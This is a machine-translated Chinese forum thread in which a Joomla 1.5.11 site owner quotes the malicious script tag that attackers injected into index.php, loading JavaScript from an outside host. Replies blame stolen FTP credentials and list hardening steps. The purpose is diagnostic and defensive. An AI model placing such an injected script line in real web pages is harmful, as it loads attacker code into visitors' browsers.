最近我的网站遭到了恶意软件的攻击。 它将我的索引页面转换为空白。 攻击在我的index.php中添加2行:
<script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Data_Type.js"></script> <!--6aa6b5f1b4e70b5a72df7793c2b6e64b--> 我正在使用这个被认为安全的服务器的joomla 1.5.11。 它是如何发生的,以及如何防止它的未来。
这是使用被盗FTP证书的常见攻击。 所以即使你的Joomla安装是安全的,你也需要使用好的密码。
现在要做的第一件事是尽快改变你的密码。
这个恶意软件的详细信息:
http://blog.sucuri.net/2010/06/web-sites-hacked-with-malware-from-iopap-upperdarby26-com.html
1)最新的更新。
2)运行IDS,并保持不应该改变的文件的校验和。
3)考虑放入一个不应该改变的文件版本的系统。
4)不要运行没有必要的软件。
5)尽可能地隔离进程和服务,并尽可能地将特权降到最低。
6)订阅您使用的软件的安全性和用户邮件列表,例如Joomla组和使用您的服务器的软件。
7)备份备份备份
8)格式化并从已知良好的来源重新安装您的服务器。 你不知道这个妥协还有多远,或者引入了什么rootkit或者其他的问题。
9)在交换机,路由器,防火墙的系统上安装监控软件…从exception情况了解“正常”stream量模式,然后调查什么时候开始看起来很奇怪。
10)保持熟悉您的业务的服务器和工作stream程。 熟悉的东西,你可以“感觉”什么时候不正确的服务器。 调查。 检查日志。
11)configuration远程logging到一个安全的服务器。 当日志是本地的时,受损的系统很容易覆盖他们的踪迹。
12)拿起一些关于系统安全的书籍或者委托某人负责更新,安全问题等。
13)隔离面向Internet的系统与您的内部开发,备份等系统。 如果您的内部系统受到logging器和嗅探器的监控,则备份function不太好。
14)不断研究服务器安全与网上的书籍和文章,因为如果你想保护你的企业(和你的客户)这样的话题,这个网站不可能涵盖你应该知道的一切。
这种攻击通常是通过泄露的ftp用户名/密码进行的